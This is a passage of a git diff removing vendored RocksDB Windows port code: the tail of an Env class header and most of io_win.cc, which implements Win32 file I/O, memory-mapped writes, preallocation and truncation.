-  Status NewSequentialFile(const std::string& fname,
-    std::unique_ptr<SequentialFile>* result,
-    const EnvOptions& options) override;
-
-  Status NewRandomAccessFile(const std::string& fname,
-    std::unique_ptr<RandomAccessFile>* result,
-    const EnvOptions& options) override;
-
-  Status NewWritableFile(const std::string& fname,
-                         std::unique_ptr<WritableFile>* result,
-                         const EnvOptions& options) override;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  Status ReopenWritableFile(const std::string& fname,
-    std::unique_ptr<WritableFile>* result,
-    const EnvOptions& options) override;
-
-  // The returned file will only be accessed by one thread at a time.
-  Status NewRandomRWFile(const std::string& fname,
-    unique_ptr<RandomRWFile>* result,
-    const EnvOptions& options) override;
-
-  Status NewDirectory(const std::string& name,
-    std::unique_ptr<Directory>* result) override;
-
-  Status FileExists(const std::string& fname) override;
-
-  Status GetChildren(const std::string& dir,
-    std::vector<std::string>* result) override;
-
-  Status CreateDir(const std::string& name) override;
-
-  Status CreateDirIfMissing(const std::string& name) override;
-
-  Status DeleteDir(const std::string& name) override;
-
-  Status GetFileSize(const std::string& fname,
-    uint64_t* size) override;
-
-  Status GetFileModificationTime(const std::string& fname,
-    uint64_t* file_mtime) override;
-
-  Status RenameFile(const std::string& src,
-    const std::string& target) override;
-
-  Status LinkFile(const std::string& src,
-    const std::string& target) override;
-
-  Status LockFile(const std::string& lockFname,
-    FileLock** lock) override;
-
-  Status UnlockFile(FileLock* lock) override;
-
-  Status GetTestDirectory(std::string* result) override;
-
-  Status NewLogger(const std::string& fname,
-    std::shared_ptr<Logger>* result) override;
-
-  uint64_t NowMicros() override;
-
-  uint64_t NowNanos() override;
-
-  Status GetHostName(char* name, uint64_t len) override;
-
-  Status GetAbsolutePath(const std::string& db_path,
-    std::string* output_path) override;
-
-  std::string TimeToString(uint64_t secondsSince1970) override;
-
-  Status GetThreadList(
-    std::vector<ThreadStatus>* thread_list) override;
-
-  void Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-    void* tag,
-    void(*unschedFunction)(void* arg)) override;
-
-  int UnSchedule(void* arg, Env::Priority pri) override;
-
-  void StartThread(void(*function)(void* arg), void* arg) override;
-
-  void WaitForJoin();
-
-  unsigned int GetThreadPoolQueueLen(Env::Priority pri) const override;
-
-  uint64_t GetThreadID() const override;
-
-  void SleepForMicroseconds(int micros) override;
-
-  // Allow increasing the number of worker threads.
-  void SetBackgroundThreads(int num, Env::Priority pri) override;
-  int GetBackgroundThreads(Env::Priority pri) override;
-
-  void IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) override;
-
-  EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-    const DBOptions& db_options) const override;
-
-  EnvOptions OptimizeForManifestWrite(
-    const EnvOptions& env_options) const override;
-
-private:
-
-  WinEnvIO      winenv_io_;
-  WinEnvThreads winenv_threads_;
-};
-
-} // namespace port
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/io_win.cc b/thirdparty/rocksdb/port/win/io_win.cc
deleted file mode 100644
index 3d2533a..0000000
--- a/thirdparty/rocksdb/port/win/io_win.cc
+++ /dev/null
@@ -1,1029 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/io_win.h"
-
-#include "monitoring/iostats_context_imp.h"
-#include "util/aligned_buffer.h"
-#include "util/coding.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-namespace port {
-
-/*
-* DirectIOHelper
-*/
-namespace {
-
-const size_t kSectorSize = 512;
-
-inline
-bool IsPowerOfTwo(const size_t alignment) {
-  return ((alignment) & (alignment - 1)) == 0;
-}
-
-inline
-bool IsSectorAligned(const size_t off) { 
-  return (off & (kSectorSize - 1)) == 0;
-}
-
-inline
-bool IsAligned(size_t alignment, const void* ptr) {
-  return ((uintptr_t(ptr)) & (alignment - 1)) == 0;
-}
-}
-
-
-std::string GetWindowsErrSz(DWORD err) {
-  LPSTR lpMsgBuf;
-  FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |
-    FORMAT_MESSAGE_IGNORE_INSERTS,
-    NULL, err,
-    0,  // Default language
-    reinterpret_cast<LPSTR>(&lpMsgBuf), 0, NULL);
-
-  std::string Err = lpMsgBuf;
-  LocalFree(lpMsgBuf);
-  return Err;
-}
-
-// We preserve the original name of this interface to denote the original idea
-// behind it.
-// All reads happen by a specified offset and pwrite interface does not change
-// the position of the file pointer. Judging from the man page and errno it does
-// execute
-// lseek atomically to return the position of the file back where it was.
-// WriteFile() does not
-// have this capability. Therefore, for both pread and pwrite the pointer is
-// advanced to the next position
-// which is fine for writes because they are (should be) sequential.
-// Because all the reads/writes happen by the specified offset, the caller in
-// theory should not
-// rely on the current file offset.
-SSIZE_T pwrite(HANDLE hFile, const char* src, size_t numBytes,
-  uint64_t offset) {
-  assert(numBytes <= std::numeric_limits<DWORD>::max());
-  OVERLAPPED overlapped = { 0 };
-  ULARGE_INTEGER offsetUnion;
-  offsetUnion.QuadPart = offset;
-
-  overlapped.Offset = offsetUnion.LowPart;
-  overlapped.OffsetHigh = offsetUnion.HighPart;
-
-  SSIZE_T result = 0;
-
-  unsigned long bytesWritten = 0;
-
-  if (FALSE == WriteFile(hFile, src, static_cast<DWORD>(numBytes), &bytesWritten,
-    &overlapped)) {
-    result = -1;
-  } else {
-    result = bytesWritten;
-  }
-
-  return result;
-}
-
-// See comments for pwrite above
-SSIZE_T pread(HANDLE hFile, char* src, size_t numBytes, uint64_t offset) {
-  assert(numBytes <= std::numeric_limits<DWORD>::max());
-  OVERLAPPED overlapped = { 0 };
-  ULARGE_INTEGER offsetUnion;
-  offsetUnion.QuadPart = offset;
-
-  overlapped.Offset = offsetUnion.LowPart;
-  overlapped.OffsetHigh = offsetUnion.HighPart;
-
-  SSIZE_T result = 0;
-
-  unsigned long bytesRead = 0;
-
-  if (FALSE == ReadFile(hFile, src, static_cast<DWORD>(numBytes), &bytesRead,
-    &overlapped)) {
-    return -1;
-  } else {
-    result = bytesRead;
-  }
-
-  return result;
-}
-
-// SetFileInformationByHandle() is capable of fast pre-allocates.
-// However, this does not change the file end position unless the file is
-// truncated and the pre-allocated space is not considered filled with zeros.
-Status fallocate(const std::string& filename, HANDLE hFile,
-  uint64_t to_size) {
-  Status status;
-
-  FILE_ALLOCATION_INFO alloc_info;
-  alloc_info.AllocationSize.QuadPart = to_size;
-
-  if (!SetFileInformationByHandle(hFile, FileAllocationInfo, &alloc_info,
-    sizeof(FILE_ALLOCATION_INFO))) {
-    auto lastError = GetLastError();
-    status = IOErrorFromWindowsError(
-      "Failed to pre-allocate space: " + filename, lastError);
-  }
-
-  return status;
-}
-
-Status ftruncate(const std::string& filename, HANDLE hFile,
-  uint64_t toSize) {
-  Status status;
-
-  FILE_END_OF_FILE_INFO end_of_file;
-  end_of_file.EndOfFile.QuadPart = toSize;
-
-  if (!SetFileInformationByHandle(hFile, FileEndOfFileInfo, &end_of_file,
-    sizeof(FILE_END_OF_FILE_INFO))) {
-    auto lastError = GetLastError();
-    status = IOErrorFromWindowsError("Failed to Set end of file: " + filename,
-      lastError);
-  }
-
-  return status;
-}
-
-size_t GetUniqueIdFromFile(HANDLE hFile, char* id, size_t max_size) {
-
-  if (max_size < kMaxVarint64Length * 3) {
-    return 0;
-  }
-
-  // This function has to be re-worked for cases when
-  // ReFS file system introduced on Windows Server 2012 is used
-  BY_HANDLE_FILE_INFORMATION FileInfo;
-
-  BOOL result = GetFileInformationByHandle(hFile, &FileInfo);
-
-  TEST_SYNC_POINT_CALLBACK("GetUniqueIdFromFile:FS_IOC_GETVERSION", &result);
-
-  if (!result) {
-    return 0;
-  }
-
-  char* rid = id;
-  rid = EncodeVarint64(rid, uint64_t(FileInfo.dwVolumeSerialNumber));
-  rid = EncodeVarint64(rid, uint64_t(FileInfo.nFileIndexHigh));
-  rid = EncodeVarint64(rid, uint64_t(FileInfo.nFileIndexLow));
-
-  assert(rid >= id);
-  return static_cast<size_t>(rid - id);
-}
-
-////////////////////////////////////////////////////////////////////////////////////////////////////
-// WinMmapReadableFile
-
-WinMmapReadableFile::WinMmapReadableFile(const std::string& fileName,
-                                         HANDLE hFile, HANDLE hMap,
-                                         const void* mapped_region,
-                                         size_t length)
-    : WinFileData(fileName, hFile, false /* use_direct_io */),
-      hMap_(hMap),
-      mapped_region_(mapped_region),
-      length_(length) {}
-
-WinMmapReadableFile::~WinMmapReadableFile() {
-  BOOL ret = ::UnmapViewOfFile(mapped_region_);
-  (void)ret;
-  assert(ret);
-
-  ret = ::CloseHandle(hMap_);
-  assert(ret);
-}
-
-Status WinMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result,
-  char* scratch) const {
-  Status s;
-
-  if (offset > length_) {
-    *result = Slice();
-    return IOError(filename_, EINVAL);
-  } else if (offset + n > length_) {
-    n = length_ - offset;
-  }
-  *result =
-    Slice(reinterpret_cast<const char*>(mapped_region_)+offset, n);
-  return s;
-}
-
-Status WinMmapReadableFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-size_t WinMmapReadableFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(hFile_, id, max_size);
-}
-
-///////////////////////////////////////////////////////////////////////////////
-/// WinMmapFile
-
-
-// Can only truncate or reserve to a sector size aligned if
-// used on files that are opened with Unbuffered I/O
-Status WinMmapFile::TruncateFile(uint64_t toSize) {
-  return ftruncate(filename_, hFile_, toSize);
-}
-
-Status WinMmapFile::UnmapCurrentRegion() {
-  Status status;
-
-  if (mapped_begin_ != nullptr) {
-    if (!::UnmapViewOfFile(mapped_begin_)) {
-      status = IOErrorFromWindowsError(
-        "Failed to unmap file view: " + filename_, GetLastError());
-    }
-
-    // Move on to the next portion of the file
-    file_offset_ += view_size_;
-
-    // UnmapView automatically sends data to disk but not the metadata
-    // which is good and provides some equivalent of fdatasync() on Linux
-    // therefore, we donot need separate flag for metadata
-    mapped_begin_ = nullptr;
-    mapped_end_ = nullptr;
-    dst_ = nullptr;
-
-    last_sync_ = nullptr;
-    pending_sync_ = false;
-  }
-
-  return status;
-}
-
-Status WinMmapFile::MapNewRegion() {
-
-  Status status;
-
-  assert(mapped_begin_ == nullptr);
-
-  size_t minDiskSize = file_offset_ + view_size_;
-
-  if (minDiskSize > reserved_size_) {
-    status = Allocate(file_offset_, view_size_);
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  // Need to remap
-  if (hMap_ == NULL || reserved_size_ > mapping_size_) {
-
-    if (hMap_ != NULL) {
-      // Unmap the previous one
-      BOOL ret = ::CloseHandle(hMap_);
-      assert(ret);
-      hMap_ = NULL;
-    }
-
-    ULARGE_INTEGER mappingSize;
-    mappingSize.QuadPart = reserved_size_;
-
-    hMap_ = CreateFileMappingA(
-      hFile_,
-      NULL,                  // Security attributes
-      PAGE_READWRITE,        // There is not a write only mode for mapping
-      mappingSize.HighPart,  // Enable mapping the whole file but the actual
-      // amount mapped is determined by MapViewOfFile
-      mappingSize.LowPart,
-      NULL);  // Mapping name
-
-    if (NULL == hMap_) {
-      return IOErrorFromWindowsError(
-        "WindowsMmapFile failed to create file mapping for: " + filename_,
-        GetLastError());
-    }
-
-    mapping_size_ = reserved_size_;
-  }
-
-  ULARGE_INTEGER offset;
-  offset.QuadPart = file_offset_;
-
-  // View must begin at the granularity aligned offset
-  mapped_begin_ = reinterpret_cast<char*>(
-    MapViewOfFileEx(hMap_, FILE_MAP_WRITE, offset.HighPart, offset.LowPart,
-    view_size_, NULL));
-
-  if (!mapped_begin_) {
-    status = IOErrorFromWindowsError(
-      "WindowsMmapFile failed to map file view: " + filename_,
-      GetLastError());
-  } else {
-    mapped_end_ = mapped_begin_ + view_size_;
-    dst_ = mapped_begin_;
-    last_sync_ = mapped_begin_;
-    pending_sync_ = false;
-  }
-  return status;
-}
-
-Status WinMmapFile::PreallocateInternal(uint64_t spaceToReserve) {
-  return fallocate(filename_, hFile_, spaceToReserve);
-}
-
-WinMmapFile::WinMmapFile(const std::string& fname, HANDLE hFile, size_t page_size,
-  size_t allocation_granularity, const EnvOptions& options)
-  : WinFileData(fname, hFile, false),
-  hMap_(NULL),
-  page_size_(page_size),
-  allocation_granularity_(allocation_granularity),
-  reserved_size_(0),
-  mapping_size_(0),
-  view_size_(0),
-  mapped_begin_(nullptr),
-  mapped_end_(nullptr),
-  dst_(nullptr),
-  last_sync_(nullptr),
-  file_offset_(0),
-  pending_sync_(false) {
-  // Allocation granularity must be obtained from GetSystemInfo() and must be
-  // a power of two.
-  assert(allocation_granularity > 0);
-  assert((allocation_granularity & (allocation_granularity - 1)) == 0);
-
-  assert(page_size > 0);
-  assert((page_size & (page_size - 1)) == 0);
-
-  // Only for memory mapped writes
-  assert(options.use_mmap_writes);
-
-  // View size must be both the multiple of allocation_granularity AND the
-  // page size and the granularity is usually a multiple of a page size.
-  const size_t viewSize = 32 * 1024; // 32Kb similar to the Windows File Cache in buffered mode
-  view_size_ = Roundup(viewSize, allocation_granularity_);
-}
-
-WinMmapFile::~WinMmapFile() {
-  if (hFile_) {
-    this->Close();
-  }
-}
-
-Status WinMmapFile::Append(const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-
-  while (left > 0) {
-    assert(mapped_begin_ <= dst_);
-    size_t avail = mapped_end_ - dst_;
-
-    if (avail == 0) {
-      Status s = UnmapCurrentRegion();
-      if (s.ok()) {
-        s = MapNewRegion();
-      }
-
-      if (!s.ok()) {
-        return s;
-      }
-    } else {
-      size_t n = std::min(left, avail);
-      memcpy(dst_, src, n);
-      dst_ += n;
-      src += n;
-      left -= n;
-      pending_sync_ = true;
-    }
-  }
-
-  // Now make sure that the last partial page is padded with zeros if needed
-  size_t bytesToPad = Roundup(size_t(dst_), page_size_) - size_t(dst_);
-  if (bytesToPad > 0) {
-    memset(dst_, 0, bytesToPad);
-  }
-
-  return Status::OK();
-}
-
-// Means Close() will properly take care of truncate
-// and it does not need any additional information
-Status WinMmapFile::Truncate(uint64_t size) {
-  return Status::OK();
-}
-
-Status WinMmapFile::Close() {
-  Status s;
-
-  assert(NULL != hFile_);
-
-  // We truncate to the precise size so no
-  // uninitialized data at the end. SetEndOfFile
-  // which we use does not write zeros and it is good.
-  uint64_t targetSize = GetFileSize();
-
-  if (mapped_begin_ != nullptr) {
-    // Sync before unmapping to make sure everything
-    // is on disk and there is not a lazy writing
-    // so we are deterministic with the tests
-    Sync();
-    s = UnmapCurrentRegion();
-  }
-
-  if (NULL != hMap_) {
-    BOOL ret = ::CloseHandle(hMap_);
-    if (!ret && s.ok()) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to Close mapping for file: " + filename_, lastError);
-    }
-
-    hMap_ = NULL;
-  }
-
-  if (hFile_ != NULL) {
-
-    TruncateFile(targetSize);
-
-    BOOL ret = ::CloseHandle(hFile_);
-    hFile_ = NULL;
-
-    if (!ret && s.ok()) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to close file map handle: " + filename_, lastError);
-    }
-  }
-
-  return s;
-}
-
-Status WinMmapFile::Flush() { return Status::OK(); }
-
-// Flush only data
-Status WinMmapFile::Sync() {
-  Status s;
-
-  // Some writes occurred since last sync
-  if (dst_ > last_sync_) {
-    assert(mapped_begin_);
-    assert(dst_);
-    assert(dst_ > mapped_begin_);
-    assert(dst_ < mapped_end_);
-
-    size_t page_begin =
-      TruncateToPageBoundary(page_size_, last_sync_ - mapped_begin_);
-    size_t page_end =
-      TruncateToPageBoundary(page_size_, dst_ - mapped_begin_ - 1);
-
-    // Flush only the amount of that is a multiple of pages
-    if (!::FlushViewOfFile(mapped_begin_ + page_begin,
-      (page_end - page_begin) + page_size_)) {
-      s = IOErrorFromWindowsError("Failed to FlushViewOfFile: " + filename_,
-        GetLastError());
-    } else {
-      last_sync_ = dst_;
-    }
-  }
-
-  return s;
-}
-
-/**
-* Flush data as well as metadata to stable storage.
-*/
-Status WinMmapFile::Fsync() {
-  Status s = Sync();
-
-  // Flush metadata
-  if (s.ok() && pending_sync_) {
-    if (!::FlushFileBuffers(hFile_)) {
-      s = IOErrorFromWindowsError("Failed to FlushFileBuffers: " + filename_,
-        GetLastError());
-    }
-    pending_sync_ = false;
-  }
-
-  return s;
-}
-
-/**
-* Get the size of valid data in the file. This will not match the
-* size that is returned from the filesystem because we use mmap
-* to extend file by map_size every time.
-*/
-uint64_t WinMmapFile::GetFileSize() {
-  size_t used = dst_ - mapped_begin_;
-  return file_offset_ + used;
-}
-
-Status WinMmapFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-Status WinMmapFile::Allocate(uint64_t offset, uint64_t len) {
-  Status status;
-  TEST_KILL_RANDOM("WinMmapFile::Allocate", rocksdb_kill_odds);
-
-  // Make sure that we reserve an aligned amount of space
-  // since the reservation block size is driven outside so we want
-  // to check if we are ok with reservation here
-  size_t spaceToReserve = Roundup(offset + len, view_size_);
-  // Nothing to do
-  if (spaceToReserve <= reserved_size_) {
-    return status;
-  }
-
-  IOSTATS_TIMER_GUARD(allocate_nanos);
-  status = PreallocateInternal(spaceToReserve);
-  if (status.ok()) {
-    reserved_size_ = spaceToReserve;
-  }
-  return status;
-}
-
-size_t WinMmapFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(hFile_, id, max_size);
-}
-
-//////////////////////////////////////////////////////////////////////////////////
-// WinSequentialFile
-
-WinSequentialFile::WinSequentialFile(const std::string& fname, HANDLE f,
-                                     const EnvOptions& options)
-    : WinFileData(fname, f, options.use_direct_reads) {}
-
-WinSequentialFile::~WinSequentialFile() {
-  assert(hFile_ != INVALID_HANDLE_VALUE);
-}
-
-Status WinSequentialFile::Read(size_t n, Slice* result, char* scratch) {
-  assert(result != nullptr && !WinFileData::use_direct_io());
-  Status s;
-  size_t r = 0;
-
-  // Windows ReadFile API accepts a DWORD.
-  // While it is possible to read in a loop if n is > UINT_MAX
-  // it is a highly unlikely case.
-  if (n > UINT_MAX) {
-    return IOErrorFromWindowsError(filename_, ERROR_INVALID_PARAMETER);
-  }
-
-  DWORD bytesToRead = static_cast<DWORD>(n); //cast is safe due to the check above
-  DWORD bytesRead = 0;
-  BOOL ret = ReadFile(hFile_, scratch, bytesToRead, &bytesRead, NULL);
-  if (ret == TRUE) {
-    r = bytesRead;
-  } else {
-    return IOErrorFromWindowsError(filename_, GetLastError());
-  }
-
-  *result = Slice(scratch, r);
-
-  return s;
-}
-
-SSIZE_T WinSequentialFile::PositionedReadInternal(char* src, size_t numBytes,
-  uint64_t offset) const {
-  return pread(GetFileHandle(), src, numBytes, offset);
-}
-
-Status WinSequentialFile::PositionedRead(uint64_t offset, size_t n, Slice* result,
-  char* scratch) {
-
-  Status s;
-
-  assert(WinFileData::use_direct_io());
-
-  // Windows ReadFile API accepts a DWORD.
-  // While it is possible to read in a loop if n is > UINT_MAX
-  // it is a highly unlikely case.
-  if (n > UINT_MAX) {
-    return IOErrorFromWindowsError(GetName(), ERROR_INVALID_PARAMETER);
-  }
-
-  auto r = PositionedReadInternal(scratch, n, offset);
-
-  if (r < 0) {
-    auto lastError = GetLastError();
-    // Posix impl wants to treat reads from beyond
-    // of the file as OK.
-    if (lastError != ERROR_HANDLE_EOF) {
-      s = IOErrorFromWindowsError(GetName(), lastError);
-    }
-  }
-
-  *result = Slice(scratch, (r < 0) ? 0 : size_t(r));
-  return s;
-}
-
-
-Status WinSequentialFile::Skip(uint64_t n) {
-  // Can't handle more than signed max as SetFilePointerEx accepts a signed 64-bit
-  // integer. As such it is a highly unlikley case to have n so large.
-  if (n > _I64_MAX) {
-    return IOErrorFromWindowsError(filename_, ERROR_INVALID_PARAMETER);
-  }
-
-  LARGE_INTEGER li;
-  li.QuadPart = static_cast<int64_t>(n); //cast is safe due to the check above
-  BOOL ret = SetFilePointerEx(hFile_, li, NULL, FILE_CURRENT);
-  if (ret == FALSE) {
-    return IOErrorFromWindowsError(filename_, GetLastError());
-  }
-  return Status::OK();
-}
-
-Status WinSequentialFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-//////////////////////////////////////////////////////////////////////////////////////////////////
-/// WinRandomAccessBase
-
-inline
-SSIZE_T WinRandomAccessImpl::PositionedReadInternal(char* src,
-  size_t numBytes,
-  uint64_t offset) const {
-  return pread(file_base_->GetFileHandle(), src, numBytes, offset);
-}
-
-inline
-WinRandomAccessImpl::WinRandomAccessImpl(WinFileData* file_base,
-  size_t alignment,
-  const EnvOptions& options) :
-    file_base_(file_base),
-    alignment_(alignment) {
-
-  assert(!options.use_mmap_reads);
-}
-
-inline
-Status WinRandomAccessImpl::ReadImpl(uint64_t offset, size_t n, Slice* result,
-  char* scratch) const {
-
-  Status s;
-
-  // Check buffer alignment
-  if (file_base_->use_direct_io()) {
-    if (!IsAligned(alignment_, scratch)) {
-      return Status::InvalidArgument("WinRandomAccessImpl::ReadImpl: scratch is not properly aligned");
-    }
-  }
-
-  if (n == 0) {
-    *result = Slice(scratch, 0);
-    return s;
-  }
-
-  size_t left = n;
-  char* dest = scratch;
-
-  SSIZE_T r = PositionedReadInternal(scratch, left, offset);
-  if (r > 0) {
-    left -= r;
-  } else if (r < 0) {
-    auto lastError = GetLastError();
-    // Posix impl wants to treat reads from beyond
-    // of the file as OK.
-    if(lastError != ERROR_HANDLE_EOF) {
-      s = IOErrorFromWindowsError(file_base_->GetName(), lastError);
-    }
-  }
-
-  *result = Slice(scratch, (r < 0) ? 0 : n - left);
-
-  return s;
-}
-
-///////////////////////////////////////////////////////////////////////////////////////////////////
-/// WinRandomAccessFile
-
-WinRandomAccessFile::WinRandomAccessFile(const std::string& fname, HANDLE hFile,
-                                         size_t alignment,
-                                         const EnvOptions& options)
-    : WinFileData(fname, hFile, options.use_direct_reads),
-      WinRandomAccessImpl(this, alignment, options) {}
-
-WinRandomAccessFile::~WinRandomAccessFile() {
-}
-
-Status WinRandomAccessFile::Read(uint64_t offset, size_t n, Slice* result,
-  char* scratch) const {
-  return ReadImpl(offset, n, result, scratch);
-}
-
-Status WinRandomAccessFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-size_t WinRandomAccessFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(GetFileHandle(), id, max_size);
-}
-
-size_t WinRandomAccessFile::GetRequiredBufferAlignment() const {
-  return GetAlignment();
-}
-
-/////////////////////////////////////////////////////////////////////////////
-// WinWritableImpl
-//
-
-inline
-Status WinWritableImpl::PreallocateInternal(uint64_t spaceToReserve) {
-  return fallocate(file_data_->GetName(), file_data_->GetFileHandle(), spaceToReserve);
-}
-
-inline
-WinWritableImpl::WinWritableImpl(WinFileData* file_data, size_t alignment)
-  : file_data_(file_data),
-  alignment_(alignment),
-  next_write_offset_(0),
-  reservedsize_(0) {
-
-  // Query current position in case ReopenWritableFile is called
-  // This position is only important for buffered writes
-  // for unbuffered writes we explicitely specify the position.
-  LARGE_INTEGER zero_move;
-  zero_move.QuadPart = 0; // Do not move
-  LARGE_INTEGER pos;
-  pos.QuadPart = 0;
-  BOOL ret = SetFilePointerEx(file_data_->GetFileHandle(), zero_move, &pos,
-      FILE_CURRENT);
-  // Querying no supped to fail
-  if (ret) {
-    next_write_offset_ = pos.QuadPart;
-  } else {
-    assert(false);
-  }
-}
-
-inline
-Status WinWritableImpl::AppendImpl(const Slice& data) {
-
-  Status s;
-
-  assert(data.size() < std::numeric_limits<DWORD>::max());
-
-  uint64_t written = 0;
-  (void)written;
-
-  if (file_data_->use_direct_io()) {
-
-    // With no offset specified we are appending
-    // to the end of the file
-
-    assert(IsSectorAligned(next_write_offset_));
-    assert(IsSectorAligned(data.size()));
-    assert(IsAligned(GetAlignement(), data.data()));
-
-    SSIZE_T ret = pwrite(file_data_->GetFileHandle(), data.data(),
-     data.size(), next_write_offset_);
-
-    if (ret < 0) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to pwrite for: " + file_data_->GetName(), lastError);
-    }
-    else {
-      written = ret;
-    }
-
-  } else {
-
-    DWORD bytesWritten = 0;
-    if (!WriteFile(file_data_->GetFileHandle(), data.data(),
-      static_cast<DWORD>(data.size()), &bytesWritten, NULL)) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to WriteFile: " + file_data_->GetName(),
-        lastError);
-    }
-    else {
-      written = bytesWritten;
-    }
-  }
-
-  if(s.ok()) {
-    assert(written == data.size());
-    next_write_offset_ += data.size();
-  }
-
-  return s;
-}
-
-inline
-Status WinWritableImpl::PositionedAppendImpl(const Slice& data, uint64_t offset) {
-
-  if(file_data_->use_direct_io()) {
-    assert(IsSectorAligned(offset));
-    assert(IsSectorAligned(data.size()));
-    assert(IsAligned(GetAlignement(), data.data()));
-  }
-
-  Status s;
-
-  SSIZE_T ret = pwrite(file_data_->GetFileHandle(), data.data(), data.size(), offset);
-
-  // Error break
-  if (ret < 0) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError(
-      "Failed to pwrite for: " + file_data_->GetName(), lastError);
-  }
-  else {
-    assert(size_t(ret) == data.size());
-    // For sequential write this would be simple
-    // size extension by data.size()
-    uint64_t write_end = offset + data.size();
-    if (write_end >= next_write_offset_) {
-      next_write_offset_ = write_end;
-    }
-  }
-  return s;
-}
-
-// Need to implement this so the file is truncated correctly
-// when buffered and unbuffered mode
-inline
-Status WinWritableImpl::TruncateImpl(uint64_t size) {
-  Status s = ftruncate(file_data_->GetName(), file_data_->GetFileHandle(),
-    size);
-  if (s.ok()) {
-    next_write_offset_ = size;
-  }
-  return s;
-}
-
-inline
-Status WinWritableImpl::CloseImpl() {
-
-  Status s;
-
-  auto hFile = file_data_->GetFileHandle();
-  assert(INVALID_HANDLE_VALUE != hFile);
-
-  if (fsync(hFile) < 0) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("fsync failed at Close() for: " +
-      file_data_->GetName(),
-      lastError);
-  }
-
-  if(!file_data_->CloseFile()) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("CloseHandle failed for: " + file_data_->GetName(),
-      lastError);
-  }
-  return s;
-}
-
-inline
-Status WinWritableImpl::SyncImpl() {
-  Status s;
-  // Calls flush buffers
-  if (fsync(file_data_->GetFileHandle()) < 0) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError(
-        "fsync failed at Sync() for: " + file_data_->GetName(), lastError);
-  }
-  return s;
-}
-
-
-inline
-Status WinWritableImpl::AllocateImpl(uint64_t offset, uint64_t len) {
-  Status status;
-  TEST_KILL_RANDOM("WinWritableFile::Allocate", rocksdb_kill_odds);
-
-  // Make sure that we reserve an aligned amount of space
-  // since the reservation block size is driven outside so we want
-  // to check if we are ok with reservation here
-  size_t spaceToReserve = Roundup(offset + len, alignment_);
-  // Nothing to do
-  if (spaceToReserve <= reservedsize_) {
-    return status;
-  }
-
-  IOSTATS_TIMER_GUARD(allocate_nanos);
-  status = PreallocateInternal(spaceToReserve);
-  if (status.ok()) {
-    reservedsize_ = spaceToReserve;
-  }
-  return status;
-}
-
-
-////////////////////////////////////////////////////////////////////////////////
-/// WinWritableFile
-
-WinWritableFile::WinWritableFile(const std::string& fname, HANDLE hFile,
-                                 size_t alignment, size_t /* capacity */,
-                                 const EnvOptions& options)
-    : WinFileData(fname, hFile, options.use_direct_writes),
-      WinWritableImpl(this, alignment) {
-  assert(!options.use_mmap_writes);
-}
-
-WinWritableFile::~WinWritableFile() {
-}
-
-// Indicates if the class makes use of direct I/O
-bool WinWritableFile::use_direct_io() const { return WinFileData::use_direct_io(); }
-
-size_t WinWritableFile::GetRequiredBufferAlignment() const {
-  return GetAlignement();
-}
-
-Status WinWritableFile::Append(const Slice& data) {
-  return AppendImpl(data);
-}
-
-Status WinWritableFile::PositionedAppend(const Slice& data, uint64_t offset) {
-  return PositionedAppendImpl(data, offset);
-}
-
-// Need to implement this so the file is truncated correctly
-// when buffered and unbuffered mode
-Status WinWritableFile::Truncate(uint64_t size) {
-  return TruncateImpl(size);
-}
-
-Status WinWritableFile::Close() {
-  return CloseImpl();
-}
-
-  // write out the cached data to the OS cache
-  // This is now taken care of the WritableFileWriter
-Status WinWritableFile::Flush() {
-  return Status::OK();
-}
-
-Status WinWritableFile::Sync() {
-  return SyncImpl();
-}
-
-Status WinWritableFile::Fsync() { return SyncImpl(); }
-
-uint64_t WinWritableFile::GetFileSize() {
-  return GetFileNextWriteOffset();
-}
-
-Status WinWritableFile::Allocate(uint64_t offset, uint64_t len) {
-  return AllocateImpl(offset, len);
-}
-
-size_t WinWritableFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(GetFileHandle(), id, max_size);
-}
-
-/////////////////////////////////////////////////////////////////////////
-/// WinRandomRWFile
-
-WinRandomRWFile::WinRandomRWFile(const std::string& fname, HANDLE hFile,
-                                 size_t alignment, const EnvOptions& options)
-    : WinFileData(fname, hFile,
-                  options.use_direct_reads && options.use_direct_writes),
-      WinRandomAccessImpl(this, alignment, options),
-      WinWritableImpl(this, alignment) {}
-
-bool WinRandomRWFile::use_direct_io() const { return WinFileData::use_direct_io(); }
-
